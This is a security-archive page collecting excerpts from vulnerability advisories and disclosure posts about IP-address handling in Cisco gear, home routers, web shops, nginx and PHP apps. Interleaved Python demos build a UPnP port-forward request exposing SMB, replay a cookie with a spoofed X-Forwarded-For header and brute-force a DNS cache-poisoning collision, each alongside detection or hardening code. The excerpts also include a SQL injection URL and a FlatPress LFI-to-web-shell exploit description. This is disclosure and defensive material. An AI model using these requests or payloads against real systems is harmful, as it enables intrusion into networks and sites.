IP addressing

Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability

As a workaround, configure an access control list (ACL) in the
signaling / media VLAN on the Route Processor (RP). The following
examples show how VLAN 140 is configured as the signaling / media
VLAN. A separate VLAN (VLAN 77) is configured as Fault Tolerance
(FT). An ACL is added to the signaling/media VLAN on the RP filtering
all TCP port 2000 packets to the alias IP address.

Cisco SBC configuration

    interface vlan 140
      ip address 10.140.1.90 255.255.255.0

BT Home Flub: Pwnin the BT Home Hub (5) - exploiting IGDs remotely via UPnP

actually lead to UPnP being exploited remotely, even if the web admin
console is not visible from the Internet!

The following is a non-malicious proof-of-concept exploit which sets
up a port-forwarding rule from port 1337 on the WAN interface to port
445 on the internal IP address 192.168.1.64. That address is the
first usable IP address reserved for clients connected to Speedtouch
and BT Home Hub routers. The exploit has been tested on BT Home Hub -
Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled
by default on the BT Home Hub, just like most IGDs. If your Internet
gateway is a BT Home Hub, clicking on the following link should add a
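The AddPortMapping request behind the forwarding rule described above, as an added Python example (not the Home Hub proof-of-concept from the post, which was a link the victim clicks; only its effect is described here). It builds the standard WANIPConnection:1 SOAP action for WAN 1337 -> 192.168.1.64:445/TCP and parses such a request back so a LAN sensor can flag mappings that expose SMB. The gateway address and control URL are assumptions; a real client learns them from SSDP discovery and the device description.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"
ET.register_namespace("s", SOAP_NS)
ET.register_namespace("u", WANIP_NS)

# Assumption: where the IGD's WANIPConnection control URL lives. A real client
# learns it from the device description fetched after SSDP discovery.
CONTROL_URL = "http://192.168.1.254:80/upnp/control/igd/wanipc"


def build_add_port_mapping(external_port, internal_client, internal_port,
                           protocol="TCP", description="", lease=0, remote_host=""):
    """Returns (headers, body) for the AddPortMapping action. The IGD applies
    it without any authentication; that is what the PoC relies on."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope", {f"{{{SOAP_NS}}}encodingStyle": SOAP_ENC})
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    action = ET.SubElement(body, f"{{{WANIP_NS}}}AddPortMapping")
    fields = [("NewRemoteHost", remote_host), ("NewExternalPort", external_port),
              ("NewProtocol", protocol), ("NewInternalPort", internal_port),
              ("NewInternalClient", internal_client), ("NewEnabled", 1),
              ("NewPortMappingDescription", description), ("NewLeaseDuration", lease)]
    for tag, value in fields:          # argument order follows the WANIPConnection spec
        ET.SubElement(action, tag).text = str(value)
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{WANIP_NS}#AddPortMapping"'}
    return headers, ET.tostring(env, encoding="unicode")


def parse_add_port_mapping(xml_text):
    """Inverse of the above, for a LAN sensor watching traffic to the IGD.
    Returns None when the body is not an AddPortMapping call."""
    action = ET.fromstring(xml_text).find(f".//{{{WANIP_NS}}}AddPortMapping")
    if action is None:
        return None
    return {child.tag: (child.text or "") for child in action}


RISKY_INTERNAL_PORTS = {445: "SMB", 139: "NetBIOS", 3389: "RDP", 23: "telnet", 22: "SSH"}


def assess(mapping):
    """One-line verdict: which internal host and service the WAN rule exposes."""
    internal_port = int(mapping["NewInternalPort"])
    verdict = (f"WAN {mapping['NewProtocol']}/{mapping['NewExternalPort']} -> "
               f"{mapping['NewInternalClient']}:{internal_port}")
    service = RISKY_INTERNAL_PORTS.get(internal_port)
    return verdict + (f" exposes {service}" if service else "")


if __name__ == "__main__":
    headers, body = build_add_port_mapping(1337, "192.168.1.64", 445, description="pwn")
    print(f"POST {CONTROL_URL}")
    for k, v in headers.items():
        print(f"{k}: {v}")
    print(body)
    print(assess(parse_add_port_mapping(body)))
```

Nothing in the action carries credentials: whoever can make a LAN host (the victim's browser included) POST this body to the control URL gets the forward. Logging AddPortMapping bodies at the gateway and running them through assess() is the cheapest detection.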

FreeWebshop.org: multiple vulnerabilities

complete compromise of the entire system.

------------------------------------------------------------------------
IP spoofing
------------------------------------------------------------------------
When a user logs into FWS, the user's IP address is stored in the
database. This is done to prevent replay of (stolen) session cookies. If
FWS is called with a session cookie from a different IP address, the
user will not be logged into FWS. The IP address is obtained using
GetUserIP(). This function first checks whether the HTTP request
contains the X-Forwarded-For or Client-IP HTTP headers. These headers
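What the GetUserIP() logic described above lets an attacker do, as an added Python example (not FWS code; the vulnerable function models the header precedence the advisory describes, the hardened one is the usual fix). The WSGI-style environ dicts, the session record and the trusted-proxy address 10.0.0.5 are constructed for the example.

```python
import ipaddress

# Assumption (not from the advisory): the address of our own reverse proxy.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def get_user_ip_vulnerable(environ):
    """Models the behaviour the advisory describes for GetUserIP(): the
    client-supplied X-Forwarded-For / Client-IP headers win over the
    address the TCP connection actually came from."""
    for header in ("HTTP_X_FORWARDED_FOR", "HTTP_CLIENT_IP"):
        value = environ.get(header)
        if value:
            return value.split(",")[0].strip()
    return environ["REMOTE_ADDR"]


def get_user_ip_hardened(environ):
    """Honours X-Forwarded-For only when the TCP peer is a proxy we run,
    and then takes the right-most entry (the one our proxy appended);
    anything the client put in the header itself is ignored."""
    peer = ipaddress.ip_address(environ["REMOTE_ADDR"])
    forwarded = environ.get("HTTP_X_FORWARDED_FOR", "")
    if peer in TRUSTED_PROXIES and forwarded:
        try:
            return str(ipaddress.ip_address(forwarded.split(",")[-1].strip()))
        except ValueError:
            pass  # malformed header: fall back to the proxy's own address
    return str(peer)


def session_accepted(session, environ, get_ip):
    """The FWS check as described: the cookie is honoured only if the
    request's IP equals the one stored at login."""
    return session["ip"] == get_ip(environ)


# Constructed scenario: alice logged in from 203.0.113.10; an attacker at
# 198.51.100.7 replays her stolen cookie and forges the header.
ALICE_SESSION = {"user": "alice", "ip": "203.0.113.10"}
REPLAY_REQUEST = {
    "REMOTE_ADDR": "198.51.100.7",
    "HTTP_X_FORWARDED_FOR": "203.0.113.10",
    "HTTP_COOKIE": "PHPSESSID=stolen",
}

if __name__ == "__main__":
    print("vulnerable accepts replay:",
          session_accepted(ALICE_SESSION, REPLAY_REQUEST, get_user_ip_vulnerable))
    print("hardened accepts replay:  ",
          session_accepted(ALICE_SESSION, REPLAY_REQUEST, get_user_ip_hardened))
```

The binding only means something if the address comes from the socket, or from a proxy you operate. Even then, IP binding is a weak second factor: users behind carrier NAT share one address with strangers, and mobile users change address mid-session.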

Cisco ACE XML Gateway <= 6.0 Internal IP disclosure

Vulnerability Information
=======================================
Product:        Cisco ACE XML Gateway <= 6.0
Vulnerability:  Internal IP Address Disclosure
Vendor:         Cisco Systems, Inc. http://www.cisco.com
Product URL:    http://www.cisco.com/en/US/products/ps7314/
Author:         nitrus  [ Alejandro Hernandez H. ]
Discovery Date: 24/Aug/2009
Attack Vector:  Remote

Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted TCP Sequence Vulnerability

Devices configured for ALPS are vulnerable. The default TCP listening
ports for ALPS are 350 and 10000. The following example shows a
vulnerable ALPS configuration:

    alps local-peer <ip address>

Further information about ALPS is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
the Airline Product Set" at the following link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfalps_ps1835_TSD_Products_Configuration_Guide_Chapter.html

Cisco Security Advisory: Cisco IOS Software Network Time Protocol Packet Vulnerability

Workarounds
===========

There are no workarounds other than disabling NTP on the device. The
following mitigations have been identified for this vulnerability. Only
packets destined for an IP address configured on the device can exploit
it; transit traffic cannot.

Note: NTP peer authentication is not a workaround and is still a
vulnerable configuration.

Cisco Security Advisory: Multiple DLSw Denial of Service Vulnerabilities in Cisco IOS

    "dlsw local-peer"

or

    "dlsw local-peer peer-id <IP address>"

Any version of Cisco IOS prior to the versions which are listed in
the Software Versions and Fixes section below is vulnerable.

To determine the version of Cisco IOS software running on a Cisco

CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass

There are some issues in the way IE enforces zone security policies when
a URI is specified in UNC form (i.e.,
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'). In this case, Internet
Explorer classifies as *Internet Zone* any UNC address pointing to an IP
address, including '127.0.0.1'. As a result, any website (belonging to
any security zone) can address and redirect the navigation flow to files
stored under '\\127.0.0.1'.

If an attacker controlling a website finds a way to store HTML with any
valid scripting code on the local file system of the visitor and then

[SECURITY] CVE-2008-3271 - Apache Tomcat information disclosure

Tomcat 6.0.x is not affected
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may also be affected

Description:
Bug 25835 (https://issues.apache.org/bugzilla/show_bug.cgi?id=25835) can,
in very rare circumstances, permit a user from a non-permitted IP address
to gain access to a context protected with a valve that extends
RemoteFilterValve.

Mitigation:
Upgrade to:

PR07-40: Authentication Bypass, Passwords Leakage and SNMP Injection on 3Com AP 8760

What's important to note is that every time an "authenticated" URL is
accessed, there is _no_ authentication data being sent within HTTP
requests whatsoever. There are no passwords, or session IDs being
submitted at all within HTTP requests. Instead, the AP uses the
administrator's source IP address as authentication data.

This means that the authentication state relies on the false assumption
that post-authentication URLs won't be known by an attacker and that the
attacker and the administrator will _not_ share the same source IP
address. By simply accessing administrative URLs in a browser from _the

Anonymous Remote Arbitrary Code Execution in Alien Arena 7.30

listed game servers, asking each for its description. The client's parsing of
the servers' responses is vulnerable to a buffer overflow attack.

The client is designed to listen for incoming UDP packets from
master.corservers.com and from the game servers on port 27901, however it will
accept and parse UDP packets from any IP address even if the client did not
initiate a UDP conversation with that given IP address. As such, an attacker
can send a malformed UDP packet from any source IP address; they need not know
a valid game server's IP address to exploit this buffer overflow vulnerability.

When the client receives a UDP packet on port 27901 that specifies a server's

Cisco Security Advisory: Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities

Details
=======

Mobile IP is part of both IPv4 and IPv6 standards. Mobile IP allows a
host device to be identified by a single IP address even though the
device may move its physical point of attachment from one network to
another. Regardless of movement between different networks,
connectivity at the different points is achieved seamlessly without
user intervention. Roaming from a wired network to a wireless or
wide-area network is also possible.

[FIXED] Remote Denial of Service for SSH service at Dell DRAC4 (maybe Mocana SSH)

80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$

To bring the SSH daemon running at the DRAC4 down, the following command
can be used in combination with the already described nmap version:


[ELEYTT] Public Advisory 05-12-2007

1. IBM Tivoli Provisioning Manager Express Multiple Cross-Site
Scripting Vulnerabilities
2. IBM Tivoli Provisioning Manager Express Remote Username
Enumeration Weakness
3. Computer Associates eTrust Threat Management Console
IP Address HTML Injection Weakness
4. Gadu-Gadu Skin Attribute Handling Remote Denial of Service
Vulnerability
5. Gadu-Gadu Remote User Addition Vulnerability



Re: nginx internal DNS cache poisoning

> (Restart nginx and run only the second command to see its expected
> behavior; i.e., actually fetching http://www.google.com/.)
> 
> This works because crc32("www.google.com.") ==
> crc32("www.google.com.9nyz309.crc32.dempsky.org.").  The first request
> cached the IP address for www.google.com.9nyz309.crc32.dempsky.org,
> and then the second request used this IP address instead of querying
> for www.google.com's real IP address because of the matching CRCs and
> the common prefix.
> 
> [1] http://marc.info/?l=nginx&m=125257590425747&w=2
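A toy of the cache lookup the quoted message describes, as an added Python example (not nginx code). The vulnerable cache keys on crc32(name) and, on a hit, only checks that the cached name starts with the queried one; the finder brute-forces a label in the shape of the 9nyz309 name against a truncated CRC so it finishes in about a second (the full 32-bit search is 2^32 work per target). The 198.51.100.7 answer and the attacker-domain label are constructed; post_pair_collides() simply evaluates the post's own pair at 32 bits.

```python
import itertools
import string
import zlib


def crc(name, bits=32):
    """CRC-32 of a DNS name, optionally truncated so a collision can be
    brute-forced quickly in this toy (nginx uses the full 32 bits)."""
    return zlib.crc32(name.encode()) & ((1 << bits) - 1)


class ResolverCache:
    """Cache keyed by crc(name). exact=False reproduces the flaw: on a
    hash hit, the cached name only has to *start with* the queried name."""

    def __init__(self, bits=32, exact=False):
        self.bits, self.exact, self.table = bits, exact, {}

    def store(self, name, addr):
        self.table[crc(name, self.bits)] = (name, addr)

    def lookup(self, name):
        hit = self.table.get(crc(name, self.bits))
        if hit is None:
            return None
        cached_name, addr = hit
        if self.exact:
            return addr if cached_name == name else None
        return addr if cached_name.startswith(name) else None   # the bug


def find_colliding_name(target, attacker_domain, bits,
                        alphabet=string.ascii_lowercase + string.digits):
    """Search for a label L such that crc(target + L + '.' + attacker_domain)
    equals crc(target): the shape of the 9nyz309 name in the post. The
    attacker owns attacker_domain, so the resolver caches whatever address
    the attacker's name server answers for that name."""
    want = crc(target, bits)
    for length in itertools.count(1):
        for label in itertools.product(alphabet, repeat=length):
            candidate = f"{target}{''.join(label)}.{attacker_domain}"
            if crc(candidate, bits) == want:
                return candidate


def poison_demo(bits=20):
    """First request resolves the attacker's colliding name (answer
    constructed here); second request asks for the real target."""
    target = "www.google.com."
    evil = find_colliding_name(target, "crc32.dempsky.org.", bits)
    vulnerable, fixed = ResolverCache(bits), ResolverCache(bits, exact=True)
    for cache in (vulnerable, fixed):
        cache.store(evil, "198.51.100.7")      # attacker's authoritative answer
    return evil, vulnerable.lookup(target), fixed.lookup(target)


def post_pair_collides():
    """Evaluates the pair quoted above against the standard 32-bit CRC."""
    return crc("www.google.com.") == crc("www.google.com.9nyz309.crc32.dempsky.org.")


if __name__ == "__main__":
    evil, poisoned, clean = poison_demo()
    print(f"colliding name: {evil}")
    print(f"vulnerable cache answers www.google.com. with {poisoned}; exact-match cache: {clean}")
    print("post's 32-bit pair collides:", post_pair_collides())
```

The exact-match cache shows the obvious hardening: when the whole name (not a prefix) is compared on a hash hit, a CRC collision costs the attacker 2^32 work and buys nothing.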

RE: hacking the mitsubishi GB-50A

If you read your own post you would realize that Mitsubishi
kept the device IP address prefix as 192.168.1, so only you can attack
yourself.

192.168 cannot be accessed from the internet ;-) [unless you NAT, at which
point it's your NAT config problem]
 

-----Original Message-----

Mtr - remote and local stack overflow - uncomment situation in libresolv.

    ...
  }
}

As we can see in [2], there is an insecure call to sprintf(). The
argument 'name' is the reverse DNS name for the IP address. The details
of exploiting this situation come later, because normally we can't do that!

Now let's look what call this function:

"display.c"

Cisco Security Advisory: Cisco 10000, uBR10012, uBR7200 Series Devices IPC Vulnerability

used to mitigate this vulnerability. UDP port 1975 is a registered
port number that can be used by certain applications. However,
filtering all packets that are destined to UDP port 1975 may cause
some applications to malfunction. Therefore, access lists need to
explicitly deny UDP 1975 packets that are sent to any router
interface IP addresses and permit transit traffic. Such access lists
need to be applied on all interfaces to be effective. Since the IPC
channel uses addresses from the 127.0.0.0/8 range, it is also
necessary to filter packets that are sourced from or destined to this
range. An example is given below:


Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

    if ( $comment_url != '' ) {
      $save_data[ 'URL' ] = clean_post_text( $comment_url );
    }

    $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
    $save_data[ 'MODERATIONFLAG' ] = $hold_flag;

    // Implode the array
    $str = implode_with_keys( $save_data );


Insufficient User Input Validation in VP-ASP 6.50 Demo Code

Cross Site Scripting and Arbitrary File Access vulnerabilities are caused by 
assigning a variable from client data in file shopsessionsubs.asp, in 
Sub CookielessGenerateFilename:

        ipaddress = Request.Servervariables("REMOTE_HOST") 

Variable ipaddress is concatenated with other data in 
Sub CookielessGenerateFilename to construct a variable filename:

        tempname=prefix & "_" & mm & dd & yy & "_" & Ipaddress
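The filename construction from the VP-ASP code above, as an added Python example (not VP-ASP code). REMOTE_HOST is the reverse-DNS name of the client's address, and whoever controls that PTR record chooses its contents, so it is attacker input. The hostile PTR value, the temp directory and the session prefix are constructed.

```python
import hashlib
import os


def cookieless_filename_vulnerable(prefix, mm, dd, yy, remote_host):
    """Mirrors the VP-ASP concatenation: the reverse-DNS name lands in the path."""
    return f"{prefix}_{mm}{dd}{yy}_{remote_host}"


def cookieless_filename_hardened(prefix, mm, dd, yy, remote_host):
    """Never lets client-influenced bytes into the path: the name is reduced to
    a fixed-width hex token, so PTR records containing '/', '..', '<' or
    quotes cannot reach the filesystem or a rendered page."""
    token = hashlib.sha256(remote_host.encode("utf-8", "surrogateescape")).hexdigest()[:32]
    return f"{prefix}_{mm}{dd}{yy}_{token}"


def escapes_directory(base_dir, filename):
    """True when base_dir/filename resolves outside base_dir (path traversal)."""
    base = os.path.abspath(base_dir)
    full = os.path.abspath(os.path.join(base, filename))
    return os.path.commonpath([base, full]) != base


# Constructed hostile PTR record. DNS labels may carry almost any octets, so an
# attacker controlling reverse DNS for their address chooses what REMOTE_HOST says.
HOSTILE_REMOTE_HOST = "/../../wwwroot/shopdisplay.asp"

if __name__ == "__main__":
    for fn in (cookieless_filename_vulnerable, cookieless_filename_hardened):
        name = fn("sess", "01", "09", "08", HOSTILE_REMOTE_HOST)
        print(f"{fn.__name__}: {name!r} escapes: {escapes_directory('/var/vpasp/temp', name)}")
```

If the name has to be tied to a client at all, use REMOTE_ADDR after parsing it with the ipaddress module; a validated address contains only digits and dots (or hex and colons), which is safe both in a filename and in HTML.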

Re: [Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

--On Wednesday, November 21, 2007 21:45:35 +1100 XSS Worm XSS Security 
Information Portal <cross-site-scripting-security@xssworm.com> wrote:
>
> In the case of Yahoo, security firm Finjan said hackers exploited an
> unused IP address within Yahoo's hierarchy and used that as the domain
> address behind a forged Google Analytics domain name. This fooled the
> Finjan Web-filtering product into believing a person was going to a
> highly trusted Yahoo domain. The victims, customers of Finjan, never knew
> they were on a malicious Web site, and neither did the security
> mechanisms on the network. (In this case, Finjan's Web-filtering


DNS Multiple Race Exploiting Tool

other hand, if a DNS server with recursion sends a query with the recursion
bit unset (i.e., an iterative query), the reply has to have this bit unset,
too.

 C. The tool spoofs the source IP address of the queries. This is useful if
the attacker does not want to leave any trace of his IP address on the server.

 D. The tool utilizes the CNAME record type to inject the false entry. The way
the

MSN messenger sends IP addresses Public and Private

Msn messenger 8.5.1
-------------------------------
Description :

The MSNP15 protocol used by the Windows Live Messenger 8.5.1 client
transmits information about the public and private IP address. This
happens during a conversation started with someone in your contact list.

Analyzing the conversation with Wireshark shows that, in addition to
information such as the sessionid, the Cal and the Ringing, it also
passes Ipv4ExternalAddrsAndPorts

RE: Microsoft DID DISCLOSE potential Backdoor

> send family
> email, nothing more. He installed Microsoft's Malicious Removal Tool.
> Farmer John's
> machine becomes infected at some point and sends Microsoft information
> about the
> compromise: "I'm Farmer John's machine coming from X_IP_Address".
>
> A correlation is done with this information and then supposedly used to
> track where the
> botnet's originating IP address is from. From the article: "Analysis by
> Microsoft's

FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution

PHP shell.
   *              It exploits the LFI, hides the shell in the cache directory
   *              and starts a remote command session via POST.
   *
   * Syntax: php fp-lfi2rce.php <host> <path> [action] [lang] [shell]
   *         <host>:   the hostname or IP address of your target;
   *         <path>:   the path where FlatPress was installed;
   *         [action]: the action to take against the host system (test, attack);
   *         [lang]:   the remote language used (en, it);
   *         [shell]:  if already exploited, you could just have the shell name.

INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT

                index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
                
                ----[ RECORD ... ]
                {
                
                        ---IP ADDRESS   sniffed ip address
                        ---REFERER              xssed theme
                        ---COOKIES              xssed cookies of forum member
                        ---USER ID              xssed user id of forum member
                        ---ADMIN NAME   admin username
                        ---ADMIN PASS   admin pass hash

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

       : 192
    Service Port                : 10
    Service Port Mac Address    : 0011.92ff.8742
    Service IP Address          : 192.168.10.1
    Management IP Address       : 192.168.1.123
    Software Version            : 5.1.151.0

SYMSA-2007-007: Palm OS Treo Smartphone Denial of Service

Treo Smartphones running the Palm OS are vulnerable to a
remote Denial of Service attack while connected to data
networks allowing inbound ICMP traffic. It is possible for
an attacker to launch this attack from the Internet by sending
specially crafted ICMP requests at the targeted phone's
assigned IP address.

Details:

Sending continuous ICMP echo requests with a packet size of
1470 bytes to the Smartphone's assigned IP address will invoke

Cisco Security Advisory: Cisco IOS Secure Shell Denial of Service

For more information on restricting traffic to VTYs, please consult: 
http://cisco.com/en/US/products/sw/iosswrel/ps1835/products_command_reference_chapter09186a00800873c8.html#wp1017389

The following example permits access to VTYs from the 192.168.1.0/24
netblock and the single IP address 172.16.1.2 while denying access
from anywhere else:

    Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255
    Router(config)# access-list 1 permit host 172.16.1.2
    Router(config)# line vty 0 4


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
